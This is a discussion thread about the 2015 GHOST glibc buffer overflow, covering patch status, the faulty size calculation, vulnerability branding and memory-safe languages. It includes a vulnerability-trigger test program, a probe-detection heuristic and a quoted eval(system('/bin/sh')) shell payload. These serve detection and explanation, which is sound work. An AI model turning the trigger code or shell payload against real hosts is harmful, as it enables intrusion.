"Professionalism" is overrated. And this appears to be a "drop everything and fix it" bug, so the "damn sensationalism" is warranted. If clients calling you about a vulnerability bothers you, get out of this line of work, please.

People actually giving a shit about security holes is something we've been wanting for a long time. It beats the hell out of the alternative, something we've been dealing with since the 90s or so!


Professionalism is thinking and understanding before you start firing a gun at your infrastructure, testing stuff and not shooting client SLAs.

We do that bit between the CVE being announced and patching shit, not when the press goes ape shit.

So, that's overrated is it?


Yes. When there's an exploit available now, you really don't have that luxury.


His point is that severity is orthogonal to the coolness of vulnerability names. And that this will cause whacky priorities in future.

Plus, 99% of the time, end users are not directly responsible for patching these issues. So why the focus on mass-media friendly marketing?


If the mass media is getting real life sysadmins to get bugged about security holes, how is that anything but a net positive?


That's not the point. The mass media knows nothing about security.

Here is what is happening when vulnerabilities get their own brand names, with logos and marketing:

1. Vulnerabilities are implicitly severe if they attract media attention (and only if they attract media attention). I've been featured in the press twice for vulnerabilities. Neither of them were as serious as the least serious, unpublicized vulnerability on this page: https://hackerone.com/internet.

2. It implicitly encourages rating a vulnerability's severity by how much media attention it receives, not by an objective scale.

It's causing a race to the bottom where coordinated disclosure now requires a PR firm, a presskit, a logo, and a brand name. For Heartbleed and Shellshock, sure, they're serious enough for all those hoops. For everything else, the race to the bottom will commoditize these things, making vulnerabilities without them ignored, and confusing vulnerabilities with them as severe.

The final result is that it's just extra, meaningless noise tacked on to vulnerability disclosure that makes it more difficult to achieve, involves more parties and doesn't improve anything.


I don't think so.

Between Heartbleed and Shellshock, and now this, a PR firm marketing vulnerabilities like this seems... crass.


I think it's okay to assign a media name to vulnerabilities, but only if the vulnerability is truly severe enough (easy to exploit and serious magnitude) to warrant it. Otherwise it's just an attempt at marketing and PR.

In this case, it looks like the name is probably not warranted.


plus the original email was sent from a PR agency.


Debian was updated, but their website does not show it.

It's version 2.13-38+deb7u7

A standard update command should get it, but if not you can find it here:

http://security.debian.org/pool/updates/main/e/eglibc/


Here's a quick writeup I made with all of the information I found in this thread.

Feedback welcome:

http://product.reverb.com/2015/01/28/patching-cve-2015-0235-...


Good writeup, I liked the gists you picked out.

I've got some feedback though:

The bug has been fixed (May 21, 2013, between the releases of glibc-2.17 and glibc-2.18).

So your statement "This bug effects all versions of libc6 greater than 2.2+ (which was released Nov, 10, 2000) so you’ll be really lucky if you’re not vulnerable." is wrong.

For example, Ubuntu 14.04 uses glibc-2.19-1 which isn't affected.


Thanks for the feedback. I've updated the post to omit that statement since it's not entirely helpful.


Does anyone have any pointers as to an example hostname that would trigger this? I am trying to determine if one can write a signature for it.

--Conclusion: inet_aton() is the only option, and the hostname must have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a", where a, b, c, d must be unsigned integers, at most 0xfffffffful, converted successfully (ie, no integer overflow) by strtoul() in decimal or octal (but not hexadecimal, because 'x' and 'X' are forbidden). --

So essentially, any DNS lookups of the form a.b.c.d, a.b.c, a.b, or a where a,b,c,d are all numbers, should be considered suspicious?
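
A rough sketch of such a signature in C (hedged: this catches GHOST-shaped probes, not every conceivable trigger; looks_like_ghost_probe is a made-up helper):

  #include <string.h>

  int looks_like_ghost_probe(const char *name) {
    size_t len = strlen(name);
    if (len <= 253)   /* legal DNS names never exceed 253 characters */
      return 0;
    /* Oversized *and* made only of digits and dots: no real DNS answer
       looks like this, so treat it as suspicious. */
    return strspn(name, "0123456789.") == len;
  }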



ALAS covering this vulnerability:

https://alas.aws.amazon.com/ALAS-2015-473.html

As usual, the Elastic Beanstalk team (with their forked yum repositories) are lagging behind on a fix.


This might be a good time to sign the promise not to use C/C++ on new projects... http://www.flourish.org/promise/


yeah by using python, you will never run into problems like this https://github.com/python/cpython/search?utf8=✓&q=gethostbyn...


According to this update: http://www.openwall.com/lists/oss-security/2015/01/27/18

The Qualys guys were unable to find any issues with sshd and tcp_wrappers. I imagine I'm not the only one that has /etc/hosts.deny set up to reject all but some IPs, but according to Qualys' tests this issue cannot be triggered via someone with exploitable RDNS. As far as they know -- of course you should upgrade when you can.


Here is how you can handle it without rebooting the whole server:

  for s in $(lsof | grep libc | awk '{print $1}' | sort | uniq); do
    if [[ -f "/etc/init.d/$s" && "$(ps aufx | grep -v grep | grep $s)" ]]; then
      echo $s; service $s restart
    fi
  done

From: http://blog.wallarm.com/post/109402223343/ghost-a-brief-reca...


RedHat has patches out for RHEL5 only so far

https://rhn.redhat.com/errata/RHSA-2015-0090.html



The Qualys security advisory says that it was fixed independently in 2013, so RHEL6 and 7 might already have the fix.

http://www.openwall.com/lists/oss-security/2015/01/27/9


Yes, it was fixed upstream in glibc, but that doesn't mean the distros actually get the patch into their distribution. In fact, the report states: "Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example."


Correct, if you download the src rpm for the latest version of glibc for RHEL 6.5 and compare it with the fix, you will see it is not patched.


Oh yeah, that was obvious, not sure how I missed it. Thanks.


I spent most of the day tracking down the status of various Linux distros. Blog post forthcoming, but the TL;DR is that you need to patch RedHat.


Glancing over the patch, this appears to be the crucial part:

           size_needed = (sizeof (*host_addr)
    -                    + sizeof (*h_addr_ptrs) + strlen (name) + 1);
    +                    + sizeof (*h_addr_ptrs)
    +                    + sizeof (*h_alias_ptr) + strlen (name) + 1);
Doesn't it seem disappointing that some programmers, for whatever reason, just can't seem to count correctly?


I find it pretty funny how no matter how many times we're shown that unsafe languages blow up on all sorts of code by all sorts of programmers, anyone would still try to defend the language.

FFS in this case they even found the bug and fixed it, but didn't notice how it could be a vulnerability. So even with eyes directly on issues, we (human programmers excluding djb) can't seem to get it right.


> I find it pretty funny how no matter how many times we're shown that unsafe languages blow up on all sorts of code by all sorts of programmers, anyone would still try to defend the language.

Heartbleed, Shellshock, Ghost. OpenSSL implemented their own memory allocator, so you would get the same result in another language. Shellshock was a parsing failure, memory safety had nothing to do with it, still arbitrary code execution. Ghost is very hard to exploit, which is why people didn't notice how it could be. It's like trying to exploit an off by one error.

Bugs in production code are not "safe" regardless of what language you use. What we need are better ways to find bugs before the code is put into production.


Shellshock is somewhat atypical for systems vulns no? Looking at all the CVEs for Microsoft for a couple of years, essentially all critical security exploits are due to their use of C/C++.

Heartbleed would not happen just because of a custom allocator. E.g. Rust allows you to do so, but would have prevented that code from compiling.

Basically, using C/C++ means that in addition to all the normal security logic errors like command injection, you've got to worry that an errant copy or overflow hands total execution control to an attacker. It's bizarre to not realise this is a huge language failing and that most of the systems level exploits are purely due to poor languages. Even despite all the crazy codegen and memory janking modern compilers and OSes do, even with some hardware support, it's still happening.


> Shellshock is somewhat atypical for systems vulns no? Looking at all the CVEs for Microsoft for a couple of years, essentially all critical security exploits are due to their use of C/C++.

You're kind of answering your own question. Most OS bugs are in C because most OS code is in C.

> Heartbleed would not happen just because of a custom allocator. Eg Rust allows you to do so, but would have prevented that code from compiling.

If you get a large buffer and then "allocate" it by returning pointers to pieces of it (or offsets if you don't have pointers), now the compiler/runtime only knows where the end of the buffer is, not where the end of the allocation is supposed to be. You can write dumb code in any language.

> Basically, using C/C++ means that in addition to all the normal security logic errors like command injection, you've got to worry that an errant copy or overflow hands total execution control to an attacker. It's bizarre to not realise this is a huge language failing and that most of the systems level exploits are purely due to poor languages.

The problem with this reasoning is that it's solving the problem in the wrong place. Yes, if you screw up very badly then it's better for the language to blow up the program than let the attacker control it. But you still have to solve the other problem, which is that the attacker can blow up the program or possibly do other things even with "safe" languages because the program is parsing unvalidated input etc. And solving that problem, which needs to happen regardless, causes the first problem to go away.


You're not reading it correctly. Microsoft's critical vulns are nearly all of the class of errors that, say, Rust, solves. Memory safety issues. If Windows was written in, e.g. Rust, all those security issues simply would not have happened. I'm not sure how I can make this more clear.

While you can write dumb code in any language, programmers somehow end up not writing remote code execution from simple copies in other languages. Yet in C, this keeps happening.


> You're not reading it correctly. Microsoft's critical vulns are nearly all of the class of errors that, say, Rust, solves. Memory safety issues. If Windows was written in, e.g. Rust, all those security issues simply would not have happened. I'm not sure how I can make this more clear.

And what I'm saying is that you're solving the problem in the wrong place. I'll take a static analysis tool that will find a buffer overrun at compile time over a runtime that blows up the program in production, every time.

> While you can write dumb code in any language, programmers somehow end up not writing remote code execution from simple copies in other languages. Yet in C, this keeps happening.

Shellshock, eval, SQL injection, people will write dumb code that results in remote code execution using whatever you like.


  > I'll take a static analysis tool that will find a buffer 
  > overrun at compile time over a runtime that blows up the 
  > program in production, every time.
Then you'll love Rust, where the compiler is essentially one ultra-comprehensive static analyzer. :)


Cool, well in all this time, all the C static and dynamic security features are still failing. So today, in the real world, your choices seem to be either fail at runtime or fail and execute arbitrary code.


Reason why people defend unsafe languages:

If you make it idiot-proof, someone will make a better idiot.


Care to point out all the RCEs that exist in the millions of lines of C# and Java out there? Apart from exec/eval I don't recall seeing a single one (I'm sure there's a few where they interop or use unsafe code.)


http://www.cvedetails.com/vulnerability-list/vendor_id-45/pr...

That's 12 just in one of the more popular Java web frameworks.

RCE is possible in any language.


Those appear to be all exec/eval type bugs. Yes, if you do "eval($querystring)" you've got a problem in any language, including C.


There are only 2 really difficult problems in computer science: cache invalidation, naming things, and off-by-one errors.


I have no idea if it would apply here, but many instances where a field is forgotten in a size calculation happen because the field wasn't originally there, and not all of the relevant code got updated when it was added. Beware any code that requires knowledge of all elements of some set, and still compiles if a new element is added and the code isn't updated for it.
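
One defensive idiom against exactly that failure mode, sketched with a hypothetical resolv_scratch struct (not glibc's actual layout): let a single struct describe the fixed-size pieces, so adding a field grows the size arithmetic automatically instead of relying on a hand-written sum.

  #include <netinet/in.h>
  #include <string.h>

  struct resolv_scratch {
    struct in_addr host_addr;
    char *h_addr_ptrs[2];
    char *h_alias_ptr[1];
    /* the NUL-terminated name is appended right after this header */
  };

  /* A new field added to the struct is counted automatically; there is
     no separate sum to forget to update. */
  size_t size_needed_for(const char *name) {
    return sizeof(struct resolv_scratch) + strlen(name) + 1;
  }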


It is nice if they can count. However instead of sending them back to kindergarten, it might make sense to find a compiler/language/framework that would make inability to count not result in easy remote exploits.


Without trolling, it is true that string manipulation has been a fertile source of major bugs. I don't really see the benefit of having to manipulate arrays of characters manually instead of a string datatype. An unmanaged language doesn't really gain anything from this, apart from this sort of embarrassment.


So remove the ability to use pointers to directly access memory. Then you're only left with all of the other security vulnerabilities found in every such language.


It would still be an improvement.


Uh, how often do code execution vulnerabilities show up in non-C programs compared to how often they show up in C programs?


All the time: SQLi, XSS, arbitrary file upload, ...


XSS is a totally different level. When's the last time a bunch of networked devices needed patches because of XSS?

And even if these problems were as widespread, eliminating a huge class of errors is a big step up. Nearly every serious vulnerability in Microsoft's code for the past years is from memory unsafeness.

Hell, why bother with malaria or smallpox vaccines, since people just die from something else anyways.


The answer to your question is "all the time", because most new appliances are using more high-level languages and XSS-prone interfaces. This also ignores all the ones that don't get found/fixed.

Of course we should work to eliminate problems, but you have to consider the bigger picture and whether abandoning the language is worth it. So far the pros outweigh the few unique cons.


The fun part is that when you find a language/framework that (e.g.) deserializes data by running eval(), it's so much easier to write portable exploits. 32 bit, 64 bit, x86, arm, mips, aslr? None of that matters. Literally eval(system("/bin/sh")) and done.


Not really. h_addr_ptrs and h_alias_ptr look very similar, and that style with the random linebreaks is practically begging for this kind of error.

I'm far more disappointed that so many programmers haven't adopted better systems, systems that avoid the possibility of this kind of error entirely.


Unless I've misread the patch, the problem isn't that they counted the sizeof the wrong thing, it's that they forgot one of the things entirely. sizeof() the same thing twice would have been explained by similar names.


> Doesn't it seem disappointing that some programmers, for whatever reason, just can't seem to count correctly?

Yet there seems to exist this belief in the C world, that they can.


Yeah, "I would have written it right."


Counting is the hardest thing in programming.


In case anyone has tons of Docker images and is looking for an easy way to list those which include a vulnerable glibc version, here is a handy one-liner: https://5pi.de/2015/01/27/find-ghosts-in-your-docker-images/


FYI I get a certificate error - ERR_CERT_AUTHORITY_INVALID - when trying to access your site over the provided https link. OS X 10.10, Chrome and Safari.


I see a chain error - looks like the intermediate certificate is missing.


The 64-bit version update failed to update the libc.so.6 link, so my system was still vulnerable after the update.

Link fix here: http://killtube.org/showthread.php?2118-GHOST-gethostbyname%...


I'm having trouble updating my Ubuntu Server 12.04.5 LTS server to patch this vulnerability.

http://askubuntu.com/questions/578565/ubuntu-12-04-5-lts-won...



This is embarrassing. We now know that the line "with many eyes, all bugs are shallow" is just wrong. What we do know now is that the open source process does not converge to a no-bugs state.

It's time to start phasing out C/C++. Languages which don't know how big their arrays are have to go. If it can run efficiently in a garbage-collected environment, it should be in Go or some scripting language. If it can't use GC, Rust is almost there. (As I say occasionally, I really hope the Rust guys don't screw up.) C and C++ should not be used for new work.

It has been 1 days since the last buffer overflow vulnerability report.


I wish people would stop tarring C++ with the same brush - this vulnerability is caused by exactly the sort of manual dicking around with memory and buffer sizes that is trivial to avoid and completely unidiomatic in C++ but de rigueur in C. Is it possible to create these sorts of bugs in C++? Of course it is, but that's a far cry from an environment that actively leads you down a dangerous path because it lacks the necessary higher level abstractions.


C++ lacks the necessary higher-level abstractions to write memory-safe code. It is vulnerable to iterator invalidation, use-after-free, dangling references, and so forth. RAII does not provide the necessary guarantees.


Please justify your last statement - RAII is often used with Smart Pointers (now in the standard library).


> What we do know now is that the open source process does not converge to a no-bugs state.

Nobody to be taken seriously has ever thought or said this -- it says about as much as "You know, I'm not perfect...".

Go itself (as of 1.3) is still coded in C, and I have no idea if/how C and Rust are related... C isn't going away, and tooling (Coverity, valgrind, nice compilers like clang) is our friend, as is work like OpenBSD's string-handling amendments, malloc() guards, etc.

I really am sympathetic to the complaints against C, but "Burn it!! It's a witch!" doesn't grab me.


Nobody to be taken serious has ever thought or said this

Linus Torvalds is nobody to be taken seriously?


I don't think Linus ever said it. I'm not sure he even agrees with it. Eric S. Raymond named it after him because of Linux.

That said, Eric S. Raymond didn't say the quoted either. He said that "given enough eyeballs, all bugs are shallow", which is a much less bold claim (imo, at least) than that open source converges towards zero bugs over time.


Well it never meant "there are no bugs in open source code" over any length of time. It just means that if a project has enough eyeballs on it, bugs will be squashed quickly. But how many eyeballs is "enough"? Obviously OpenSSL didn't have enough. Does glibc?


This bug was actually fixed 2 years ago, so I'm not sure this is the best example to make your point.


Do we really know that the open source process doesn't converge? No specification for the length of time toward convergence exists, and you could argue that this case is an example of inching ever closer to a no-bugs state.


Turns out, open source code is written by humans, same as at Microsoft. I remember, back in the day, it was absolutely pathetic that Microsoft Outlook had a buffer overflow in the subject line that could be tripped simply by receiving an email. Well, oops.


> We now know that the line "with many eyes, all bugs are shallow" is just wrong.

How many eyes have actually looked at this code?


Aside from the fact that this bug was seen by eyes and fixed years ago (long enough ago that several if not most distributions have shipped a new LTS release with it fixed), even if they didn't know it was a security fix, this:

> We now know that the line "with many eyes, all bugs are shallow" is just wrong.

Remains roughly like saying, while watching the tide go out, that sea levels aren't rising. Anyone who thought it meant bugs get fixed instantaneously, and who now uses the fact that they do get found and fixed as counter-proof of the sentiment, was wrong. It doesn't make the idea fundamentally wrong.


Garbage collection has a performance hit which may not be desirable. You don't really want your network stack to stall from time to time, and an OS built that way wouldn't be usable in any mission-critical environment.

Array boundaries checking also has a performance hit but I am coming to think it is a necessary evil.

Dealing with strings as char arrays is just absurd. There isn't a significant performance hit to using some string datatype that reduces the opportunity for bugs.
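To illustrate, even a minimal length-carrying string type in plain C closes off whole classes of these bugs. A sketch (the names here are made up, in the same spirit as libraries like sds or bstring):

    #include <stdlib.h>
    #include <string.h>

    /* Hypothetical length-carrying string: the length travels with the
       bytes, so bounds checks never depend on finding a terminating NUL. */
    struct str {
        size_t len;
        char   data[];   /* flexible array member; NUL kept for C interop */
    };

    struct str *str_new(const char *s) {
        size_t n = strlen(s);
        struct str *r = malloc(sizeof *r + n + 1);
        if (r == NULL)
            return NULL;
        r->len = n;
        memcpy(r->data, s, n + 1);   /* copy the bytes plus the NUL */
        return r;
    }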


Array bounds checking can often be optimized out. For constructs such as "for x in foo {}" this is trivial. The more general cases require a compiler which can hoist subscript checks out of loops when possible. The compiler has to be allowed to generate checks which fail early; that is, if the loop is going to subscript out of range at iteration 100 and there's no way to exit the loop early, then one check at loop entry is sufficient. This is hard to express to some optimizers.
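Concretely, the hoist looks something like this hand-written sketch (bounds_fail() is a stand-in for whatever the runtime does on a failed check):

    #include <stddef.h>
    #include <stdlib.h>

    static void bounds_fail(void) { abort(); }   /* hypothetical trap */

    /* What a naive bounds-checking compiler emits: a check per access. */
    long sum_checked(const long *a, size_t len, size_t n) {
        long sum = 0;
        for (size_t i = 0; i < n; i++) {
            if (i >= len)
                bounds_fail();           /* per-iteration check */
            sum += a[i];
        }
        return sum;
    }

    /* The hoisted form: the loop has no early exit and i covers [0, n),
       so a single check at entry fails before any out-of-range access. */
    long sum_hoisted(const long *a, size_t len, size_t n) {
        if (n > len)
            bounds_fail();               /* one check, hoisted out */
        long sum = 0;
        for (size_t i = 0; i < n; i++)
            sum += a[i];
        return sum;
    }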


> What we do know now is that the open source process does not converge to a no-bugs state.

And with closed source, who knows?!

>C and C++ should not be used for new work.

It's funny how articles on C/C++ seem to shoot to the front page here...


> It's time to start phasing out C/C++

Well, unless you get rid of the C/C++ interfaces in all the syscalls and Win32 APIs; hell, Microsoft tried that with managed code and utterly failed to deliver.


Then they did .NET and converted everybody to C#.


I hate these "just use another language! All problems solved" kind of posts. Mainly because it's shit logic.


Except, "just use another language! All problems of this huge category solved!" is true in this case. You can't have buffer overflows on a memory-safe language. Sure, this is only true assuming the VM and all the stuff it depends on is formally verified not to have buffer overflows either, which is unlikely to happen. But even so, you get the slightly weaker guarantee: "just use another language! All problems of this huge category won't be your fault!" ;)

Now, it is not always practical to use safe languages for everything (especially low-level libraries such as, say, libc...), and that 'huge category' of problems is not even remotely close to covering all security problems. But using tools that prioritize not shooting yourself in the foot by default is not a bad consideration to make, all other things being similar.


Rust provides memory safety without a VM to begin with.

Although I do not like the comparison because it's not factually correct, Rust is like the "safe subset of C++". Writing actually safe, modern C++ is very close to writing valid Rust. After learning Rust, I became a better C++ programmer.


As I understand it (and keep in mind I have never used Rust, so I might be completely wrong), Rust does have ways to perform unsafe pointer operations and the standard library includes code that does this, no? So, replace VM with libstd. Even if this is not the case, the compiler could produce code that is not memory safe due to bugs in the compiler itself. Turtles all the way down and all that.

Either way, I am all for reducing the number of places where random pointer juggling happens inside a program, be it by using a VM or forbidding certain language features outside of small system libraries (e.g. by banning "unsafe fn" from your own Rust code or by using a static checker to force you to use only the "safe subset of C++"). That way we just need to get a couple thousand lines of code right to solve this particular class of nastiness forever, instead of the hundreds of millions of LOCs that live above the system abstractions.


There are still a few things that Rust provides that C++ doesn't. In particular, I think Rust's ability to link different objects' lifetimes together (think iterators and containers) without forcing you to treat them as the same object will be one of its most significant contributions to language semantic design.


The thing is, it's not necessarily true in this case.

While C was intended to run as close to bare metal as possible, and 99% of current implementations do, that doesn't have to be the case. The C specification describes an abstract machine, and uses abstract concepts, with explicit "as-if" rules saying that implementations may, in many cases, do whatever they want, providing that conforming code runs as if it would on a naive implementation.

So there's no reason at all that, for example, pointers have to be implemented as actual bare addresses in a virtual address space which cannot be bounds checked. It should be perfectly possible to create a new implementation, with a new ABI, which defines pointers as a checked type such that all accesses through a pointer are accurately bounds checked, with a guaranteed "virtual" segfault happening whenever an invalid read or write would have occurred.

Sure, it's not ABI-compatible (by default) with current bare-metal C ABIs, and would require shims to work with bare-metal C libraries - but that's no different from Rust and other similar new languages. Sure, it's not quite as fast as bare-metal C implementations due to enforced bounds checking, but it's not going to be slower than Rust and similar languages which do the same job.

And the advantage would be, we wouldn't need to rewrite all our code. We could just recompile all the existing C code we already have to this new safe ABI, rather than having to rewrite everything from scratch in some new language!

Sure, C isn't the nicest language to use. But we already have plenty of existing code that uses it. Why don't we just write a new compiler back-end and take advantage of all that code in a safe manner?


You can't bounds check a pointer begotten from &arr[i]. It simply doesn't carry enough information. Moreover, there might be existing C programs that rely on out of bounds access (where they know that the out of bounds access falls into safe memory). So there is no way to implement a C virtual machine with bounds-checking semantics that is fully compatible with all existing C code.


Sure you can. If, for (bloated, demonstration-only) example, your opaque managed pointer type is actually this under the hood:

    struct pointer { void *real_base; size_t size; size_t offset; };

then

    type *p = &arr[i];

translates to

    struct pointer p = { arr, sizeof(arr), i * sizeof(arr[0]) };

and any use of "(p + j)" or "p[j]" can check that (p.offset + j * sizeof(arr[0])) is greater than or equal to zero and less than p.size.

"there might be existing C programs that rely on out of bounds access (where they know that the out of bounds access falls into safe memory)"

Those programs are completely non-portable. They could break with your next compiler upgrade, let alone moving to a different compiler (clang?) or a different OS (BSD?).

It could happen. Witness the people who complained about their broken programs when memcpy() was sped up by taking advantage of the standard, or those who were surprised when NULL checks started being discarded after a pointer had already been dereferenced.
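The NULL-check case looks roughly like this (a sketch with a made-up function; the point is that the dereference lets the compiler assume the pointer is non-NULL):

    /* Hypothetical example: dereferencing p before checking it is
       undefined behavior when p is NULL, so the compiler may assume
       p != NULL and silently delete the later check. */
    int first_byte(const char *p) {
        int c = *p;            /* dereference happens first */
        if (p == NULL)         /* dead code to the optimizer */
            return -1;
        return c;
    }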

Even so, if you did have such programs, and were unlucky enough to rely on them, and were unable to fix them to comply with the C language spec, there's no reason you couldn't still compile them for the existing bare-metal ABI. I'm not proposing to *ban* the x86-64 ABI. I'm just saying let's create an additional (x86-64-safe?) ABI that we could use to provide a safe execution environment for a subset of our existing code. That subset could range from none of it to all of it, depending on how much you personally valued speed and anti-bloat over safety, how many non-conforming programs you relied upon, and whatever other factors you wanted to take into account.


Dumb question perhaps, but is there a command line command I can run to test before and after that this patch has been applied successfully?


The Qualys link (elsewhere on this page) contains sample code to test if you are vulnerable.

Also, you can check your glibc version with this tiny code:

    #include <stdio.h>
    #include <gnu/libc-version.h>
    int main (void) { puts (gnu_get_libc_version ()); return 0; }
(taken from a forum that I've since closed the page on, sorry for lack of attribution)

<= 2.17 is unsafe, >= 2.18 is safe.

ldd --version might also do the trick.


You can check your libc version by running libc - e.g. `/lib/x86_64-linux-gnu/libc.so.6`


Checking the libc version doesn't really tell you if you've fixed the problem, since most vulnerable distributions will be fixing it by patching their older version of libc, so the version number will remain the same.


Thanks, super helpful!


Does it need a marketing moniker?


gethosedbyname


Do you know the detection signature for this vulnerability? (IDS/IPS)


Is Gentoo affected?


No, the announcement [1] says the affected versions are:

> In particular, we discovered that it was fixed on May 21, 2013 (between the releases of glibc-2.17 and glibc-2.18)

Gentoo lists glibc version 2.19-r1 as the latest stable version [2] and uses that by default.

[1] http://www.openwall.com/lists/oss-security/2015/01/27/9

[2] http://packages.gentoo.org/package/sys-libs/glibc


If this was patched in 2013 why is it an issue now?


Because it was "silently" fixed so nobody applied the patch to existing, shipping systems.


From what I can gather, it wasn't originally thought to be a security vulnerability so it was thought to be acceptable to leave it be on older systems. Now somebody has figured out how to exploit it.


Sweeping-under-the-rug is a common approach. It seems that in this instance, they followed Linus Torvalds' mantra; he once said: "I don't have any reason what-so-ever to think it's a good idea to track security bugs and announce them as something special. I don't think some spectacular security hole should be glorified or cared about as being any more special than a random spectacular crash due to bad locking."


Excuse the ignorance, but could this affect OS X Macs that have GCC installed, or is it strictly limited in what it can affect?


Is this serious? Does this mean if I have an app, Java, PHP or whatever, which eventually calls glibc's gethostbyname or gethostbyaddr, my machine is owned? That somebody could just craft a special hostname or IP address to look up? So all those websites where you enter a hostname or IP address to look up something like whois info, or to ping other machines, could be owned?


If it affects gethostbyaddr that'd be really bad - there are a lot of applications that automatically look up reverse DNS on a connection.

Mail servers in particular generally make it pretty easy to trigger both forward and reverse lookups.

The test case seems to have it looking up an IP address as if it were a name, but it's using the reentrant version of the function - maybe only those are affected?
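For reference, the reentrant call exercised by the test case looks roughly like this (a minimal sketch modeled loosely on the published reproducer; the sizes here are illustrative, not calibrated to actually trigger the overflow):

    #define _GNU_SOURCE
    #include <errno.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <string.h>

    int main(void) {
        /* A long "hostname" made only of digits and dots sends glibc down
           the __nss_hostname_digits_dots() path containing the overflow. */
        char name[1024];
        memset(name, '0', sizeof(name) - 1);
        name[sizeof(name) - 1] = '\0';

        struct hostent host, *result;
        char buf[256];           /* deliberately undersized */
        int err;
        int rc = gethostbyname_r(name, &host, buf, sizeof(buf),
                                 &result, &err);

        /* A patched glibc notices the undersized buffer and returns
           ERANGE; the vulnerable path wrote past the end of buf. */
        printf("gethostbyname_r returned %d (ERANGE is %d)\n", rc, ERANGE);
        return 0;
    }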


> If it affects gethostbyaddr

The release at http://www.frsag.org/pipermail/frsag/2015-January/005722.htm... says that it affects both gethostbyname() and gethostbyaddr().



Ouch. Ouch. Ouch.



